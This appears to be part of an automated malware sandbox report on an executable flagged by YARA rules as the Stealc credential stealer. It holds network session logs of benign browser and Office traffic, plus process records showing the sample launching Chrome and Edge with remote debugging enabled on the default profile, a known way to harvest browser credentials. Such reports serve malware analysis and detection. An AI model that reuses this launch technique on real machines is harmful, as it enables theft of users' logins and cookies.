2024-11-23 06:09:54 UTC	634	OUT	GET /tenant/amp/entityid/BB1msBaE.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:54 UTC	518	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msBaE Last-Modified: Mon, 18 Nov 2024 20:05:13 GMT X-Source-Length: 57629 X-Datacenter: eastus X-ActivityId: 22935219-ab82-43bd-9d57-e5df07c8c732 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 57629 Cache-Control: public, max-age=50086 Expires: Sat, 23 Nov 2024 20:04:40 GMT Date: Sat, 23 Nov 2024 06:09:54 GMT Connection: close
2024-11-23 06:09:54 UTC	15866	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-23 06:09:55 UTC	16384	IN	Data Raw: 29 59 4d 47 48 cd 8c f2 8f 29 a8 04 63 94 aa 34 19 2d 59 e5 1d 1a a4 51 2d 18 50 f2 9b 50 eb 80 b1 86 51 65 3a 29 0e 91 ab 66 9c f9 50 f2 9b d0 b2 8b 65 96 50 ca 69 94 74 56 59 0d 1a d0 b2 a0 24 74 3a a1 95 9b 2a 0a 2a 87 40 4d 0c b1 d2 08 81 d1 74 3a 09 6c e8 74 69 43 a0 96 ce 82 8d 68 28 23 2a 1d 33 51 e0 0b 65 43 a3 4a 45 50 4b 65 94 32 9b 50 50 4b 65 94 28 d6 87 40 65 41 46 b4 14 82 5b 2a 1d 1a 50 50 2d 03 2e 82 82 20 65 50 e8 09 15 71 2e 82 8a 26 8a a2 a8 64 44 57 12 b0 18 14 01 e4 14 19 57 20 87 95 70 0c 8b 72 3c 1f 8c f7 0d 5e fb dd 94 34 65 28 c9 4a da b6 94 97 27 5e 67 c2 ff 00 ed ff 00 8a 29 56 79 45 57 e2 4e 6f fe 9c 4b 18 f7 cd 26 bd d0 fd 67 c3 e0 2c 9c 19 f3 7f 03 ee 1d f3 ba 43 51 77 9e f3 a9 a8 9e 5c 91 ff 00 31 e5 db 6f e6 4b 6e 18 23 ce Data Ascii: )YMGH)c4-YQ-PPQe:)fPePitVY$t:*@Mt:ltiCh(#3QeCJEPKe2PPKe(@eAF[*PP-. ePq.&dDWW pr<^4e(J'^g)VyEWNoK&g,CQw\1oKn#
2024-11-23 06:09:55 UTC	2995	IN	Data Raw: 25 bc b5 f0 98 ed 7a 53 d2 9e f9 c3 5e 3a 91 7d 53 6a 5d a7 26 af c2 15 e3 de 65 1e 32 d2 9b 58 ff 00 f6 e5 23 d3 fd 56 a4 24 94 fb bf 87 8a f9 65 9f 49 f5 3a 94 1f 9a 3a 5f 7b 8d a4 d6 ba be 59 66 97 94 bd c5 b9 85 b9 7c bf f2 9d 48 ab d2 ef 3d db 53 6a ac 74 e7 d5 e2 a5 eb 1c 7e 11 df 1a bc 9d 19 64 a5 ff 00 4c f6 75 1f 4b fa 8e eb a8 f2 be f1 06 f7 c3 51 34 fa d5 57 45 9b 78 31 92 4e 14 f7 5c 64 e9 79 48 b9 c8 f9 39 7c 1f be 57 cd a1 38 e1 b5 4e 3d aa 4e 2c c2 5f 0a ef 58 e5 c7 2e 2e 29 49 cd 75 28 e3 d3 1b 3e c2 5a 3a a9 52 d5 d7 ac 55 49 ad 55 d3 f3 de 3c 8e 5d 4e eb de 24 97 f9 b1 96 0b f1 c2 49 a7 cd 3d 39 41 ae 8c 50 ce 77 5f 27 e5 76 06 7d 81 7c 4f bd f3 b4 19 95 85 81 a8 cc ac 76 06 83 32 b6 17 c4 9a 8d 40 ca c7 98 8d 35 f2 0b 31 b1 e6 e0 29 1b Data Ascii: %zS^:}Sj]&e2X#V$eI::_{Yf\|H=Sjt~dLuKQ4WEx1N\dyH9\|W8N=N,_X..)Iu(>Z:RUIU<]N$I=9APw_'v}\|Ov2@51)
2024-11-23 06:09:55 UTC	16384	IN	Data Raw: 30 d6 4d ed f0 2b 37 41 cd 9e 1c 58 f3 c7 93 33 5d 1a be ae 9b e2 3b e2 8c 2f 87 98 ad f0 25 35 12 ea 4e c7 d5 da 73 60 5a ae 4c cb a4 36 5d 0b cc bc 7d 15 e6 61 4f 90 2c 0c cc 35 0e 8b e0 83 37 41 95 c7 88 b3 11 a7 4d f4 15 6b d2 f5 9c 79 ba 4d 13 5c 7c 89 50 b6 e8 ce ba 43 3f 57 91 9d 8a f8 31 43 a5 49 f0 2b 33 e0 73 76 06 63 2a eb cd c1 14 9a 7b 91 c9 98 9f 12 b7 12 96 dd fe 44 b9 61 b0 e4 5a a8 5e 32 dc 31 94 b8 7e 6b f1 df 88 77 a8 f7 fd 5d 29 4a 4a 3a 74 a3 17 8c 7f 0e da df 77 b6 cf 95 7a fa 8f 7f 46 ef 51 f6 1f c5 1a 5d de f4 f5 15 ad 69 5d f2 71 e3 c6 f6 1f 09 19 49 3b 47 d1 1e cf 33 f2 69 ce 75 b7 63 ef 1a 91 54 9b e7 b7 69 1f a8 94 9e 2d f5 b3 29 73 66 78 3d b8 1a 72 6b 2d 47 2d e2 f1 27 ce bb 08 49 6e 0c 78 06 54 e6 df 36 2b bd 8c 91 f6 80 f1 Data Ascii: 0M+7AX3];/%5Ns`ZL6]}aO,57AMkyM\\|PC?W1CI+3svc*{DaZ^21~kw])JJ:twzFQ]i]qI;G3iucTi-)sfx=rk-G-'InxT6+
2024-11-23 06:09:55 UTC	6000	IN	Data Raw: 4b a4 d1 38 7f 57 42 ae d3 9b e5 e0 8a f9 96 c6 9f 40 2d be 75 b9 45 74 ed f3 1a 97 27 25 c1 6c 39 f3 3d e9 be b2 d2 bc 63 78 11 ab 6d e2 fd 9e d2 fc 47 e8 2f ae b3 0e 99 27 cf 02 a3 28 6c 4e b8 3d 9d a6 5a 89 9d db f8 f2 e4 bc 87 e2 3a fc 2b d6 65 9b 76 1d 5b 0d 54 56 da 71 ea f6 19 d3 66 ae 77 96 6d af 46 ba da 34 52 7b a4 83 2d f2 64 34 96 ef 6a 0b ac 35 cd 2d fe 63 8b bd fe f3 25 26 b6 7c cb 93 f9 58 fc 58 ef 8d 74 92 96 e3 76 f4 f7 7a ca cb 33 9b c4 8f a4 d7 42 d8 5e 77 58 36 fb 2c 94 d4 4c 4b 6a ad b6 bc d1 6b 8c af b4 c1 6a ca 5b 53 f3 7e f1 a7 66 5a 37 b5 e1 bb 67 3e 22 a5 96 ee b8 2b f6 0b d5 d6 35 24 f7 f6 01 35 71 aa 5d 7b 7b 0d 71 df 5f 5c 99 2b 1d ff 00 7f 60 3b 58 5a fa e2 80 b7 5c 9d f6 19 38 c6 f0 b4 f9 ad 80 e4 d2 c7 67 4e cf 30 bb e4 ca Data Ascii: K8WB@-uEt'%l9=cxmG/'(lN=Z:+ev[TVqfwmF4R{-d4j5-c%&\|XXtvz3B^wX6,LKjkj[S~fZ7g>"+5$5q]{{q_\+`;XZ\8gN0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.6	49938	104.117.182.56	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:54 UTC	634	OUT	GET /tenant/amp/entityid/BB1msOOW.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:55 UTC	519	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Fri, 15 Nov 2024 09:23:39 GMT X-Datacenter: eastus X-ActivityId: 45299615-50a0-4d41-9f2b-be1f411b5255 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msOOW X-Source-Length: 76188 Content-Length: 76188 Cache-Control: public, max-age=141342 Expires: Sun, 24 Nov 2024 21:25:36 GMT Date: Sat, 23 Nov 2024 06:09:54 GMT Connection: close
2024-11-23 06:09:55 UTC	15865	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-23 06:09:55 UTC	16384	IN	Data Raw: b3 89 ae 12 0f c8 8e 44 73 07 25 6c 2f 89 78 37 88 0d 0e a0 75 2e 5c e8 bf 65 c0 91 84 4c 45 c8 e1 c2 b0 be d6 c3 3c 57 8f 3c 74 cb eb f1 72 7e 48 f5 8e a9 d3 a5 09 d7 37 60 b5 09 91 92 ad 5a 84 18 b5 0b 51 18 b5 6a 11 2c 21 6a d4 46 21 6a d5 51 88 5a b5 11 8b 50 b5 10 21 6a 11 02 10 84 40 85 ab 10 08 5a b5 06 21 6a 10 62 d4 2d 44 62 13 2c 41 8b 56 a1 06 21 6a 10 62 d4 2d 44 62 16 ad 40 a8 4c 84 46 2d 42 d4 18 85 ab 51 18 85 a8 50 62 16 a1 50 21 0b 51 18 85 a8 41 88 5a 84 18 85 a8 41 88 5a 84 18 84 2d 41 88 5a 84 18 85 a8 41 88 5a b1 14 21 08 40 21 08 41 88 5a 84 18 85 a8 50 2a 13 21 02 a1 6a 10 62 10 84 56 21 6a 10 62 16 a1 02 a1 32 54 50 b1 6a 10 62 c4 c9 51 42 c5 a8 45 2a 13 25 40 2c 5a 85 14 a8 5a b1 14 a8 5a b1 15 8b 13 25 45 62 c5 ab 14 6c a8 5a b1 Data Ascii: Ds%l/x7u.\eLE<W<tr~H7`ZQj,!jF!jQZP!j@Z!jb-Db,AV!jb-Db@LF-BQPbP!QAZAZ-AZAZ!@!AZP!jbV!jb2TPjbQBE%@,ZZZ%EblZ
2024-11-23 06:09:55 UTC	3219	IN	Data Raw: 2b e6 37 b5 45 f7 b1 38 bc 17 49 04 bc be 01 14 18 48 0e c4 0f 32 66 14 a3 54 cd 46 a2 e3 ee 5c c3 6f 50 5c e7 d1 c4 80 41 6b 5a e0 28 1a c2 05 7c a5 70 58 f6 b8 92 58 0b a0 00 72 11 bc 81 15 e5 c9 7a 63 1a 85 8d aa bb bb 36 b5 21 81 e1 83 0b 9e 63 37 d6 84 4f b4 72 e3 22 aa fd 96 d8 73 8b bd dd ed 8c 24 b9 8e 0c 66 c3 89 38 41 12 e9 82 26 5d 45 cc b5 70 62 2f 27 aa 45 a3 b2 d0 04 02 22 30 bb e9 13 26 33 2a dd bb 8e 7d b0 e0 48 e8 b2 05 23 65 c2 30 80 4c 00 41 ab a4 98 13 2a 3d 10 f4 56 c8 f7 9d 3f 55 c5 ae c0 00 c5 42 1d 8a 20 98 87 7e f0 56 6d 6a 1c 3c 41 ac b7 18 1a cc 2e 14 15 26 04 72 dd dc b8 77 61 ad b3 2e 0e 0c 6d b3 49 13 83 11 20 4e 52 e8 95 27 53 a0 f6 bd cd cc 17 e2 8d d3 15 e4 09 73 b9 67 0b 0e d3 e3 a7 47 b7 b9 75 c0 56 30 93 47 67 c5 71 75 Data Ascii: +7E8IH2fTF\oP\AkZ(\|pXXrzc6!c7Or"s$f8A&]Epb/'E"0&3}H#e0LA=V?UB ~Vmj<A.&rwa.mI NR'SsgGuV0Ggqu
2024-11-23 06:09:55 UTC	16384	IN	Data Raw: d1 8a 0e 03 3e 49 6d e9 2e 62 c6 5d 6d ad 20 43 b1 62 31 19 e1 86 8f 5c c2 8a e6 b0 9b 6c be e7 b7 15 4e 6e 22 4e 41 d2 59 b2 6b 94 9e 6b c0 6b f1 c8 0e 0e 11 94 e6 6a 6b 41 1d ab ea d7 9f a5 0d 38 a5 8d 24 c3 b0 9d a0 68 62 68 41 95 f3 df 16 b7 80 30 b1 c2 e5 a0 5e d0 e1 93 49 32 1b 90 a4 65 13 ce a8 e7 94 6c e4 e9 6e f4 ee b0 b8 b9 90 26 5b 18 8f 61 a1 5e 85 de 25 7a f3 5f 68 87 dd 61 63 85 41 71 1f bd 2d 12 22 99 13 50 bc f3 30 32 e4 86 3a eb 3a 6d 27 6a 08 df 51 02 87 2f 5a 8f ae 2d b8 ec 92 d7 08 22 48 ae fa 11 3d b4 55 ce e9 d7 d1 eb 06 99 97 08 25 d8 88 c3 b2 62 5b 91 75 44 56 a0 09 3b d7 b2 66 a6 e5 cb 16 ae 3a 0b dc d0 e7 0a 6c e2 3f bc 77 51 79 bd 05 f7 fb b3 da f1 64 80 65 8c 2d 61 da cf 11 06 91 26 8a c7 bd 39 c5 b8 89 88 c4 5c ea fb 23 69 c4 Data Ascii: >Im.b]m Cb1\lNn"NAYkkkjkA8$hbhA0^I2eln&[a^%z_hacAq-"P02::m'jQ/Z-"H=U%b[uDV;f:l?wQyde-a&9\#i
2024-11-23 06:09:55 UTC	16384	IN	Data Raw: 9b 4e ef e2 5c fd ab df ac b1 fa 4b 66 8c 63 5f fb d8 b5 13 eb 2b a8 75 9a 06 f3 d3 76 1b a7 e6 a2 3e 23 a1 e6 e6 53 97 52 e0 1d c1 cb 7b fa b8 d6 3e 61 c2 76 8e e8 f6 74 c0 f1 2e 3f 84 ab 3e db 9b 42 c1 d8 18 4f c4 af 52 3c 47 c3 62 71 b2 77 63 71 fe f3 82 b0 cf 12 d2 1f e8 f0 f9 be f3 1b f8 6e f8 25 cf 86 74 e3 fe d0 f1 4d 63 5b 5e 91 78 dc 5a 47 f7 42 9a 6d 9b 6e 07 4a 64 c6 13 39 56 b9 c9 5e df af 6d d5 07 4c 7f fe 63 07 ab 0a a9 7b ab 72 8c 76 8f c9 d7 ed bf e4 d5 6c 8c 6b a4 c7 db cf c5 e3 7a 36 1d fc 3b c3 80 3f fb 65 2b 6c 5b 6b a9 61 ce fc eb 84 7f f9 85 ea bd d6 f0 ac e9 07 e5 36 3b 95 9b 76 c8 cf dd 49 fd d7 37 e7 45 ab 73 d3 2f 3f d3 14 ff 00 75 2d e3 d6 7f e0 c2 80 3b a6 60 b6 04 fd 4d ba e0 3b 71 85 ed 83 1b f5 74 19 fc c1 f9 84 ed 6d a9 a3 Data Ascii: N\Kfc_+uv>#SR{>avt.?>BOR<Gbqwcqn%tMc[^xZGBmnJd9V^mLc{rvlkz6;?e+l[ka6;vI7Es/?u-;`M;qtm
2024-11-23 06:09:55 UTC	7952	IN	Data Raw: 25 7d ab 43 a3 66 96 d8 00 54 2e 17 87 f8 48 d3 6a 7a a7 90 a7 68 85 ec d6 79 73 bd a3 a3 5c 1c 5a 62 f2 8d cc b5 2a 17 9d ec 32 d4 88 54 32 12 a1 03 21 2a d4 0c 84 a8 44 32 12 a1 03 21 2a 10 32 c5 88 45 0b 16 a5 40 2c 5a 84 68 2c 80 b5 08 19 64 4a 10 8c 99 6a 45 a8 19 09 56 22 1d 09 10 81 d0 91 08 1d 09 10 81 d0 91 08 1d 09 10 81 d0 91 08 1d 09 50 81 d0 91 6a 06 42 54 20 65 a9 10 81 d0 95 08 87 94 24 5a 88 65 a9 10 81 d0 95 08 19 0b 11 28 19 09 56 a2 35 0b 10 88 64 25 5a 85 35 0b 10 89 46 42 55 a8 53 56 a5 42 21 90 b1 08 35 0b 10 83 50 b1 08 35 0b 16 a0 10 84 20 16 ac 42 32 64 25 42 06 42 54 20 65 8b 16 a0 c4 21 08 04 21 0a 28 42 10 8a 10 84 20 c5 88 42 80 42 10 94 a1 2a d5 89 4d 05 8b 52 a5 2b 16 2d 58 a5 29 52 29 12 25 34 8d 7c eb fc c9 e1 ce b8 5b a9 Data Ascii: %}CfT.Hjzhys\Zb2T2!D2!2E@,Zh,dJjEV"PjBT e$Ze(V5d%Z5FBUSVB!5P5 B2d%BBT e!!(B BBMR+-X)R)%4\|[

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.6	49939	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:55 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:55 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:55 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 1e58b78d-401e-0029-678d-3b9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060955Z-174c587ffdfldtt2hC1TEBwv9c00000002e00000000045xf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:55 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.6	49940	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:55 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:55 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:55 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 6f884587-b01e-0001-3155-3c46e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060955Z-15b8b599d882l6clhC1TEBxd5c00000002e0000000008a4e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:55 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.6	49941	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:56 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:57 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:56 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: efe1277d-c01e-008d-7f4b-3c2eec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060956Z-15b8b599d882l6clhC1TEBxd5c00000002c000000000dva1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:57 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Target ID:	0
Start time:	01:09:08
Start date:	23/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xf30000
File size:	1'832'960 bytes
MD5 hash:	9F1E2F4308DDB08CE70A669D67A97763
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2152563709.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2662760280.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2662001774.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:09:19
Start date:	23/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:09:20
Start date:	23/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2196,i,8775659685558455544,10122295161962970873,262144 /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:09:30
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:09:31
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2012,i,9669449525995071965,9129735360253068169,262144 /prefetch:3
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:09:31
Start date:	23/11/2024
